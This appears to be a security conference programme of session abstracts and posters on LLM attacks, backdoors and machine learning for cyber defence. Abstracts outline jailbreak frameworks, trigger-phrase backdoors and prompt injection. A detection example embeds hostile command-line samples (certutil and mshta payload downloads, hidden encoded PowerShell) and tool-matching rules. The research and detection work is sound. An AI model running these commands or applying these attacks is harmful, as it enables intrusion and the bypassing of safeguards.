Oct 22, 10:30 AM

Adversarial Attacks and Model Safeguards for LLMs and VLMs

  • 31st Floor, Sands Capital, 1000 Wilson Blvd #3000, Arlington VA

About: This session focuses on research directly addressing the vulnerabilities, attack methods, and defensive strategies for Large Language Models (LLMs) and Visual Language Models (VLMs).

A Framework for Adaptive Multi-Turn Jailbreak Attacks on Large Language Models

Speaker: Javad Rafiei Asl

This paper introduces HarmNet, a modular framework designed to systematically construct, refine, and execute multi-turn jailbreak queries against LLMs, demonstrating significantly higher attack success rates compared to prior methods.

LLM Salting: From Rainbow Tables to Jailbreaks

Speaker: Tamás Vörös

This work proposes LLM salting, a lightweight defense mechanism that rotates the internal refusal direction of LLMs, rendering previously effective jailbreak prompts (like GCG) ineffective without degrading model utility.

ShadowLogic: Hidden Backdoors in Any Whitebox LLM

Speaker: Amelia Kawasaki

This paper unveils ShadowLogic, a method for injecting hidden backdoors into white-box LLMs by modifying their computational graphs. These backdoors are activated by a secret trigger phrase, allowing the model to generate uncensored responses and exposing a new class of graph-level vulnerabilities.

Text2VLM: Adapting Text-Only Datasets to Evaluate Alignment Training in Visual Language Models

Speaker: Jake Thomas

This research presents Text2VLM, a novel pipeline that adapts text-only datasets into multimodal formats to evaluate the resilience of Visual Language Models (VLMs) against typographic prompt injection attacks. It highlights the increased susceptibility of VLMs when visual inputs are introduced.

Oct 22, 1:55 PM

AI/ML for Cyber Defense Agents & Reinforcement Learning

  • 31st Floor, Sands Capital, 1000 Wilson Blvd #3000, Arlington VA

About: This session explores the application of AI and Machine Learning, particularly agentic systems and reinforcement learning, to enhance active cyber defense and security operations.

Adaptive by Design: Contextual Reinforcement Learning for Mission-Ready Cyber Defence

Speaker: Jake Thomas

This paper introduces a framework for applying Contextual Reinforcement Learning (cRL) to cyber defense, where agents dynamically incorporate contextual signals (like mission objectives or threat assessments) to modulate their policies in real-time without retraining.

Towards a Generalisable Cyber Defence Agent for Real-World Computer Networks

Speaker: Tim Dudman

This work proposes Topological Extensions for Reinforcement Learning Agents (TERLA) to provide generalizability for cyber defense agents in networks of differing topology and size without the need for retraining. It evaluates performance in realistic simulation environments.

Improving Accuracy and Consistency in Real-World Cybersecurity AI Systems via Test-Time Compute

Speaker: Ashley Song

This study evaluates Test-Time Compute for improving the accuracy and consistency of real-world cybersecurity agentic systems, specifically a container vulnerability analysis agent and a server alert triage agent.

RIG-RAG: A GraphRAG Inspired Approach to Agentic Cloud Infrastructure

Speaker: Benji Lilley

This paper introduces Relational Inference GraphRAG (RIG-RAG), an LLM-assisted pipeline that transforms cloud configuration data into a security-enriched knowledge graph to support natural-language reasoning about deployed infrastructure. This enhances agentic capabilities for cloud security operations.
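The abstract above describes turning cloud configuration into a graph that carries security findings, so that questions about the deployment become graph queries. The following is an added illustration written for this page, not RIG-RAG's own code: it builds that kind of graph from a constructed, simplified AWS-style inventory, attaches findings derived from the relationships, and answers one question with a plain traversal in place of the LLM. The resource names, the config shape and the exposure rules are all assumptions.

```python
"""Security-enriched graph from constructed cloud configuration data.

Added example, not RIG-RAG's own code. Resources become nodes, relationships
become edges, and findings derived from the graph are attached to nodes.
The inventory below is constructed; the exposure rules are assumptions.
"""
from collections import defaultdict

# Constructed, simplified inventory in the spirit of an AWS account export.
CONFIG = {
    "security_groups": {
        "sg-web": {"ingress": [{"port": 443, "cidr": "0.0.0.0/0"}]},
        "sg-admin": {"ingress": [{"port": 22, "cidr": "0.0.0.0/0"}]},
        "sg-db": {"ingress": [{"port": 5432, "cidr": "10.0.0.0/8"}]},
    },
    "instances": {
        "i-web": {"subnet": "public-a", "sgs": ["sg-web"], "role": "role-web"},
        "i-bastion": {"subnet": "public-a", "sgs": ["sg-admin"], "role": "role-admin"},
        "i-db": {"subnet": "private-a", "sgs": ["sg-db"], "role": None},
    },
    "subnets": {"public-a": {"public": True}, "private-a": {"public": False}},
    "roles": {
        "role-web": {"policies": ["s3-read"]},
        "role-admin": {"policies": ["AdministratorAccess"]},
    },
}


def build_graph(cfg):
    """Return (nodes, edges): nodes maps id -> attributes, edges is a list of (src, relation, dst)."""
    nodes, edges = {}, []
    for sid, sub in cfg["subnets"].items():
        nodes[sid] = {"type": "subnet", **sub}
    for gid, sg in cfg["security_groups"].items():
        nodes[gid] = {"type": "security_group", "ingress": sg["ingress"]}
    for rid, role in cfg["roles"].items():
        nodes[rid] = {"type": "role", "policies": role["policies"]}
    for iid, inst in cfg["instances"].items():
        nodes[iid] = {"type": "instance"}
        edges.append((iid, "IN_SUBNET", inst["subnet"]))
        for gid in inst["sgs"]:
            edges.append((iid, "USES_SG", gid))
        if inst["role"]:
            edges.append((iid, "ASSUMES", inst["role"]))
    enrich(nodes, edges)
    return nodes, edges


def enrich(nodes, edges):
    """Attach findings that only become visible once the relationships are joined."""
    out = defaultdict(list)
    for src, rel, dst in edges:
        out[src].append((rel, dst))
    for nid, node in nodes.items():
        if node["type"] != "instance":
            continue
        in_public = any(rel == "IN_SUBNET" and nodes[dst]["public"] for rel, dst in out[nid])
        world_ports = [rule["port"] for rel, dst in out[nid] if rel == "USES_SG"
                       for rule in nodes[dst]["ingress"] if rule["cidr"] == "0.0.0.0/0"]
        admin = any(rel == "ASSUMES" and "AdministratorAccess" in nodes[dst]["policies"]
                    for rel, dst in out[nid])
        findings = []
        if in_public and world_ports:
            findings.append(f"internet-exposed on ports {sorted(world_ports)}")
        if 22 in world_ports:
            findings.append("ssh open to 0.0.0.0/0")
        if admin and in_public:
            findings.append("public instance assumes admin role")
        node["findings"] = findings


def exposed_admin_instances(nodes):
    """Query: which instances are internet-reachable and also hold admin privileges?"""
    return sorted(nid for nid, node in nodes.items()
                  if node["type"] == "instance"
                  and "public instance assumes admin role" in node.get("findings", []))


if __name__ == "__main__":
    graph_nodes, graph_edges = build_graph(CONFIG)
    for nid, node in graph_nodes.items():
        if node["type"] == "instance":
            print(nid, node["findings"])
    print("exposed admin instances:", exposed_admin_instances(graph_nodes))
```

The point of the enrichment step is that none of the three findings is visible in any single resource: "public instance assumes admin role" requires joining the subnet, the security group and the IAM role of one instance, which is exactly the kind of multi-hop relation a natural-language question such as "what is reachable from the internet with admin rights?" has to resolve.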

Oct 23, 9:50 AM

The New Geopolitics of Technology

  • 31st Floor, Sands Capital, 1000 Wilson Blvd #3000, Arlington VA

Speaker: Nathaniel Fick, CEO/Investor/U.S. Ambassador/Marine/Author

After building the cybersecurity software company Endgame, Nate Fick served from 2022-2025 as the inaugural U.S. Ambassador for Cyberspace & Digital Policy at the Department of State, leading American diplomacy around the world on technology issues including cybersecurity, digital infrastructure, digital regulatory policy, and emerging technologies. From Kyiv to Beijing, and from Brussels to Delhi, he was on the frontlines of the competition to shape the 21st century -- a competition increasingly decided by key technologies. His keynote shares lessons relevant to citizens, investors, and company-builders alike.

Oct 23, 11:00 AM

Threat & Vulnerability Analysis

  • 31st Floor, Sands Capital, 1000 Wilson Blvd #3000, Arlington VA

About: This session focuses on diverse methods for identifying, analyzing, and understanding various types of cyber threats and vulnerabilities, ranging from malware and code flaws to social and financial fraud.

MADAR: Efficient Continual Learning for Malware Analysis with Diversity-Aware Replay

Speaker: Mohammad Saidur Rahman

This study proposes MADAR, a Continual Learning (CL) framework for malware classification, which addresses catastrophic forgetting by incorporating diversity-aware replay. It demonstrates improved detection accuracy for both Windows and Android malware datasets.

Reason. Search. Retrieve. Repeat. Iterative Retrieval for Automating Vulnerable Code Discovery

Speaker: Supriti Vijay

This paper presents a multi-turn retrieval architecture for automating vulnerable code discovery, where models iteratively generate and refine search queries. It introduces a reinforcement learning environment and dataset for training such strategies.

Social Attack Surfaces: Emerging Cybersecurity Threats in Open Source Collaboration

Speaker: Christopher Honaker

This research examines social interactions in open-source code repositories using a biased BERTopic model to identify emerging cybersecurity threats (e.g., the XZ Utils backdoor) by prioritizing negative sentiment and cybersecurity keywords.

Adversarial Machine Learning Attacks on Financial Reporting via Maximum Violated Multi-Objective Attack

Speaker: Edward Raff

This work explores Adversarial Machine Learning (AML) attacks on financial reporting, demonstrating how bad actors can manipulate financial statements to inflate earnings and reduce fraud scores simultaneously, highlighting a critical information security vulnerability in financial systems.

Oct 23, 2:25 PM

ML for Enterprise Security Operations & Threat Intelligence

  • 31st Floor, Sands Capital, 1000 Wilson Blvd #3000, Arlington VA

About: This concluding session addresses practical, real-world applications of machine learning in Security Operations Centers (SOCs), focusing on detection frameworks, authentication security, and advanced threat intelligence.

Democratizing ML for Enterprise Security: A Self-Sustained Attack Detection Framework

Speaker: Sadegh Momeni

This paper proposes a two-stage hybrid framework for ML-based threat detection in enterprise security, combining loose YARA rules with an ML classifier and leveraging synthetic data generation (Simula) and active learning to achieve a self-sustained, low-overhead solution for SOCs.
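The two-stage shape described above (broad rules for recall, a classifier for precision, low-confidence cases routed to a human) is easy to show end to end. The block below is an added illustration for this page, not the paper's own code: the first stage stands in for the loose YARA rules with plain regexes (yara-python is not assumed to be installed), the second stage is a hand-rolled multinomial naive Bayes over command-line tokens, and the review band is where an active-learning loop would queue samples for labelling. The command lines, labels, rule names and thresholds are all constructed.

```python
"""Two-stage detection: loose rules for recall, a small classifier for precision.

Added example, not the paper's own code. Regexes stand in for loose YARA
rules; a tiny naive Bayes stands in for the ML classifier. All command
lines, labels and thresholds below are constructed.
"""
import math
import re
from collections import Counter

# Stage 1: deliberately broad rules. Anything that fires is handed to stage 2;
# everything else is dropped cheaply, which is what keeps overhead low.
LOOSE_RULES = {
    "powershell_enc": re.compile(r"powershell.*-(e|enc|encodedcommand)\b", re.I),
    "download_tool": re.compile(r"\b(curl|wget|certutil|bitsadmin)\b", re.I),
    "lolbin_exec": re.compile(r"\b(rundll32|regsvr32|mshta|wscript)\b", re.I),
}


def stage1(cmdline):
    """Names of loose rules that fire; an empty list means the fast path drops the event."""
    return [name for name, rx in LOOSE_RULES.items() if rx.search(cmdline)]


def tokenize(cmdline):
    return re.findall(r"[a-z0-9_.\-/:]+", cmdline.lower())


class NaiveBayes:
    """Multinomial naive Bayes with add-one smoothing over command-line tokens."""

    def __init__(self):
        self.counts = {"malicious": Counter(), "benign": Counter()}
        self.docs = Counter()
        self.vocab = set()

    def fit(self, samples):
        for text, label in samples:
            toks = tokenize(text)
            self.counts[label].update(toks)
            self.docs[label] += 1
            self.vocab.update(toks)

    def prob_malicious(self, text):
        toks = tokenize(text)
        logp = {}
        for label, cnt in self.counts.items():
            total = sum(cnt.values()) + len(self.vocab)
            lp = math.log(self.docs[label] / sum(self.docs.values()))
            for t in toks:
                lp += math.log((cnt[t] + 1) / total)
            logp[label] = lp
        m = max(logp.values())
        z = sum(math.exp(v - m) for v in logp.values())
        return math.exp(logp["malicious"] - m) / z


# Constructed labelled data; this is where synthetic samples and analyst labels would feed in.
TRAIN = [
    ("powershell -nop -w hidden -enc SQBFAFgA", "malicious"),
    ("certutil -urlcache -split -f http://203.0.113.5/a.exe a.exe", "malicious"),
    ("mshta http://203.0.113.5/x.hta", "malicious"),
    ("rundll32 shell32.dll,Control_RunDLL", "benign"),
    ("curl -sS https://repo.internal/health", "benign"),
    ("powershell -File C:\\scripts\\backup.ps1", "benign"),
    ("wget -q https://repo.internal/pkg.tar.gz", "benign"),
]


def build_model():
    model = NaiveBayes()
    model.fit(TRAIN)
    return model


def triage(cmdline, model, alert_at=0.8, review_band=(0.4, 0.8)):
    """Full pipeline: 'drop' (no rule hit), 'alert', 'review' (labelling queue) or 'benign'."""
    if not stage1(cmdline):
        return "drop"
    p = model.prob_malicious(cmdline)
    if p >= alert_at:
        return "alert"
    if review_band[0] <= p < review_band[1]:
        return "review"
    return "benign"


if __name__ == "__main__":
    nb = build_model()
    for cmd in ["notepad.exe C:\\notes.txt",
                "powershell -w hidden -enc AAAA",
                "curl -sS https://repo.internal/health",
                "wget http://203.0.113.5/x.hta"]:
        print(f"{triage(cmd, nb):7s} {cmd}")
```

Note how the stages divide the work: the `curl` health check trips a loose rule but is cleared by the classifier, the `wget` of an unknown payload is neither clearly benign nor clearly malicious and lands in the review queue, and the event that matches no rule at all never reaches the model.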

Evaluating Risk-Based Authentication Effectiveness in Production 2FA Systems

Speaker: Steven Leung

This study provides the first large-scale empirical evaluation of Risk-Based Authentication (RBA) effectiveness in production two-factor authentication (2FA) systems against real-world opportunistic, targeted, and advanced attacks. It demonstrates how heuristic and anomaly detection methods improve security while maintaining user experience.

LLM ATT&CK Navigator: Mapping Observed Generative Adversarial Techniques Across the Cyber Killchain

Speaker: Kyla Guru

This work introduces the LLM ATT&CK Navigator, an interactive tool that maps real-world instances of AI-enabled misuse onto the MITRE ATT&CK Killchain and calculates enablement risks. This provides actionable insights into current adversarial tactics for defensive prioritization.

Oct 23, 4:00 PM

Poster Session / Happy Hour

  • 32nd Floor, Sands Capital, 1000 Wilson Blvd #3000, Arlington VA

CAMLIS Posters

  1. A Platform for Rapidly Developing and Deploying Protection Against Large Language Models Attacks

    Presenter: Konstantin Berlin

  2. Accelerating Cyber Defense with Applied Open-Weight LLMs

    Presenter: Ryan Fetterman

  3. Anomaly Detection Betrayed Us, so We Gave It a New Job: Enhancing Command-Line Classification with Benign Anomalous Data

    Presenter: Ben Gelman

  4. Base Rate Measurement and Precision Forecasting

    Presenter: Michael Slawinski

  5. Benchmarking Agentic LLMs for Vulnerability Management: Exposing and Mitigating Situational Awareness Bias

    Presenter: Dmitrijs Trizna

  6. Causal Reinforcement Learning for Labelling Optimization in Cyber Anomaly Detection

    Presenter: Susan Babirye

  7. Dynamic Graph Structure for Tracking Cluster Evolution and LLM Summarization

    Presenter: Michael Slawinski

  8. Evaluating LLM Generated Detection Rules in Cybersecurity

    Presenter: Anna Bertiger

  9. Glass-box triage: An explainable-by-design LLM-ML-Human framework for high scale production threat detection

    Presenter: Caleb Fogleman

  10. Harnessing Large Language Models for Detection of AI Generated Attacks

    Presenter: Abhishek Singh

  11. Mutually-exciting point processes and topic modelling of honeypot computer terminal data

    Presenter: Daniyar Ghani

  12. Offensive Security for AI Systems: Concepts, Practices, and Applications

    Presenter: Josh Harguess

  13. PentestJudge: Autonomous Process Evaluation for AI Security Agents

    Presenter: Shane Caldwell

  14. RADAR: Open-Source Detection of Agentic Deception and Alignment Risk in LLMs

    Presenter: Edward Joseph

  15. RoleSentry: A Multi-Stage Framework for Explainable Detection of AWS Role Chaining Attacks

    Presenter: Godwin Attigah

CAMLIS Red Posters

  1. Ask What Your Country Can Do For You: Towards a Public Red Teaming Model

    Presenter: Wm. Matthew Kennedy

  2. Detecting Complex Vulnerabilities in Real-World Code - New Benchmark for Enhanced Software Security

    Presenter: Klaudia Kloc

  3. LLM backdoor poisoning: attacks and detections

    Presenter: Nir Rosen

Oct 24, 9:15 AM

Operational Tools for AI Security

  • 31st Floor, Sands Capital, 1000 Wilson Blvd #3000, Arlington VA

Attack Surfaces in Computer Use Agents: A Practical Taxonomy

Speaker: Daniel Jones

Accelerating AI red teaming operations with the Python Risk Identification Tool (PyRIT)

Speaker: Nina Chikanov

BlackIce: A Containerized Red Teaming Toolkit for AI Security Testing

Speaker: Alexander Warnecke

An Agent-Based Framework for Adversarial Simulation and Blue Teaming

Speaker: Gary Lopez Munoz

Oct 24, 12:40 PM

Emerging Risks and Defenses in AI Systems

  • 31st Floor, Sands Capital, 1000 Wilson Blvd #3000, Arlington VA

ScamAgents: How AI Agents Can Simulate Human-Level Scam Calls

Speaker: Sanket Badhe

Importing Phantoms: Measuring LLM Package Hallucination Vulnerabilities

Speaker: Arjun Krishna

PD-AutoR: Towards Automatic Restoration of Poisoned Examples in Machine Learning

Speaker: Xinyu Lei

Red Teaming AI Red Teaming

Speaker: Subhabrata Majumdar
